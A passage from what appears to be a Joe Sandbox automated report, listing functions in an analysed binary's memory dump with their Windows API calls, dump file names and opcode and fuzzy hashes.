                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1385522511-0
                                                                                                                                                                                                                                  • Opcode ID: 194590e6f205533879422ea16c588692078c8e359a9cb9fa52e517bb5aa0d10a
                                                                                                                                                                                                                                  • Instruction ID: 5c8269af45a343e271dab3bbfd315d0cd5b00e6a882cfe8debca153978ebddb5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 194590e6f205533879422ea16c588692078c8e359a9cb9fa52e517bb5aa0d10a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C732BEB5A00245DFDF21CF58C884ABABBB9FF45314F188459E806AB391D775ED82CB90
                                                                                                                                                                                                                                  Function 00A17AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2948472770-0
                                                                                                                                                                                                                                  • Opcode ID: cf907df2bfd23295c010a9717d4ae198adeb0c81d7f43b4f70c32b34b1c6a903
                                                                                                                                                                                                                                  • Instruction ID: 4893984ba3f4d79893ea902ebf20a5da110f27d52885245384d74e4e0c923761
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf907df2bfd23295c010a9717d4ae198adeb0c81d7f43b4f70c32b34b1c6a903
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80D13A75A08209EFCF14EF98D9819EDBBB5FF48310F144159E915AB291EB31AE81CF90
                                                                                                                                                                                                                                  Function 009BF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a075e0eff4cbc7d99ed3f9b3bff862b32f855fa3efb901a0343ff97460dc17c0
                                                                                                                                                                                                                                  • Instruction ID: 0740614f3442f421eb72dcc0662c1a7ce18743841763b5eaf41f4da202a573fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a075e0eff4cbc7d99ed3f9b3bff862b32f855fa3efb901a0343ff97460dc17c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6451E535A00108AFDB10DFA8CD64BE97BA5EF85374F19C178E8289B391D731AD42CB90
                                                                                                                                                                                                                                  Function 009FFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 009FFCCE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BuffCharLower
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2358735015-0
                                                                                                                                                                                                                                  • Opcode ID: 0f165a04cf20de5f905d295e1b1a6df5be67b662e4eba29e6d44638e6d99081c
                                                                                                                                                                                                                                  • Instruction ID: 693f10a3b1177448f7e8933b351e9c29eabb6b3ddb58dd83ca8ec34ea3ac97a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f165a04cf20de5f905d295e1b1a6df5be67b662e4eba29e6d44638e6d99081c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8641A4B650020DAFCB11DF68C891ABEB7B8EF84314B11853EE65697291EB70DE05CB50
                                                                                                                                                                                                                                  Function 00996679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099664A
                                                                                                                                                                                                                                    • Part of subcall function 0099663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0099665C
                                                                                                                                                                                                                                    • Part of subcall function 0099663E: FreeLibrary.KERNEL32(00000000,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099666E
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009962FA,?,00000001,?,?,00000000), ref: 009966AB
                                                                                                                                                                                                                                    • Part of subcall function 00996607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996610
                                                                                                                                                                                                                                    • Part of subcall function 00996607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00996622
                                                                                                                                                                                                                                    • Part of subcall function 00996607: FreeLibrary.KERNEL32(00000000,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996635
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2632591731-0
                                                                                                                                                                                                                                  • Opcode ID: e93a9624d04f719fdf346bd6a4fadfc022d83a0fd25ac8dfdf03b0f96c1f25bf
                                                                                                                                                                                                                                  • Instruction ID: 00dcc4e9628d65516517013da70d267277615e24e95e0cd3104ccd6603a588fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e93a9624d04f719fdf346bd6a4fadfc022d83a0fd25ac8dfdf03b0f96c1f25bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8113A72640305ABCF10BB78CD02BAD77A59F90710F10882EF482A71C2DF75DA15DB50
                                                                                                                                                                                                                                  Function 009C8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                  • Opcode ID: 52a9065a61734503ba2a3f2cf2fa5de316d575586260516866c342f3d85be311
                                                                                                                                                                                                                                  • Instruction ID: 11ef9690b236a6298a0a5ea385ba375559e9259b417e05707808b58705a79f28
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52a9065a61734503ba2a3f2cf2fa5de316d575586260516866c342f3d85be311
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3511187590420AAFCF05DF98E945EDB7BF9EF48310F1140A9F809AB311DA31EA21CB65
                                                                                                                                                                                                                                  Function 009C5373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009C4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,009C319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 009C5031
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C53DF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                                                                                                                  • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                  • Instruction ID: 1d812d334662c103788b0e47dada505bc7db1080549b0d19dc1b69f4b51fd80a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5012672A00344ABE3218F69D881F5AFBEDEBC5370F25091DE584832C0EA70A9458765
                                                                                                                                                                                                                                  Function 009BE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                  • Instruction ID: 4e2fc611057a0608eb1e582c7e98f7913146149ee032dc5dcdf1dd1122f6884d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEF02D3290161496D6313A269D05FDA375C8FC2330F104B2AF465931D1EB74E80586E3
                                                                                                                                                                                                                                  Function 0099B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 176396367-0
                                                                                                                                                                                                                                  • Opcode ID: 3c99a7606b1c5aacbbe454ac0f89dca07b9994c6359dc046420ef46ac288404b
                                                                                                                                                                                                                                  • Instruction ID: d280ed810db1910c5d68d2268066e3a3abc48f59a46076c60e172d870af8ae84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c99a7606b1c5aacbbe454ac0f89dca07b9994c6359dc046420ef46ac288404b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0C8B36017046ED7149F2DDD06BA7BB98EB84770F50852AFA19CB1D1DB35E5108BA0
                                                                                                                                                                                                                                  Function 00A0F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A0F987
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnvironmentVariable
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1431749950-0
                                                                                                                                                                                                                                  • Opcode ID: 43e8d27b8f68554de1dfbce558ca4b0c75fdf3edcf7eab59e877933f6bf1c133
                                                                                                                                                                                                                                  • Instruction ID: 8627d044f126afd1898caca77678670ea9f66bd73349e3b581b2748ed3a9c278
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43e8d27b8f68554de1dfbce558ca4b0c75fdf3edcf7eab59e877933f6bf1c133
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90F03C72604204BFCB15EBA9DD4AEDF77B8EF89720F004055F505AB261DA70EE41CB61
                                                                                                                                                                                                                                  Function 009C4FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,009C319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 009C5031
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 3852f56d9bf4ee7d3a458963db4f74d2b7ee6e7128b66e374c5b82f4bc6a161b
                                                                                                                                                                                                                                  • Instruction ID: 7e48314b802800870a15689d65c138325f429b0c6e739854f5a459918a3ec772
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3852f56d9bf4ee7d3a458963db4f74d2b7ee6e7128b66e374c5b82f4bc6a161b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45F0B436911E24A79B31DA66DC01F9A375CAF817B0F174029BC1CEB191DB64F88186E2
                                                                                                                                                                                                                                  Function 009C3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,009B6A79,?,0000015D,?,?,?,?,009B85B0,000000FF,00000000,?,?), ref: 009C3BC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 847801bf0d2effd70ff71670f0143e28fe7cd2fbf543e5e5adb335079e43a50f
                                                                                                                                                                                                                                  • Instruction ID: 9a24d0dc2c76998ee18c03500d129d907c651c50c846f0bcb3701811c1624f93
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 847801bf0d2effd70ff71670f0143e28fe7cd2fbf543e5e5adb335079e43a50f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19E0ED31A00A20A6FA203AB69C01FBA3A4CAF813B0F15C128FC18D65D5CB60DE0182E2
                                                                                                                                                                                                                                  Function 009966E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 51ad2f9a502073f4240192216d327edc3480cff39908957ed2fecf7b9699148a
                                                                                                                                                                                                                                  • Instruction ID: c00c0483863cd93061e0ad3c410e9317b8c7c91e10341f877186a17ce2070cc9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51ad2f9a502073f4240192216d327edc3480cff39908957ed2fecf7b9699148a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF03971105702CFCF349FA8D9A0866BBE8BF143293648E3EE2D686610C7359844DF10
                                                                                                                                                                                                                                  Function 009E6AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                                                                                  • Opcode ID: 55b4c9930a302aa97dd0bbac3a6a2a92225f6301d54b05d6fc11233522765766
                                                                                                                                                                                                                                  • Instruction ID: 7838d97b7e5e1a8ebf8ef71bafdece2f92d43c7acb48a33507b29e911b521f9e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55b4c9930a302aa97dd0bbac3a6a2a92225f6301d54b05d6fc11233522765766
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F05571708240AAE7308BA9AC057B2F7E8BB60350F10892AD4C483081C7BA08C09791
                                                                                                                                                                                                                                  Function 0099684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
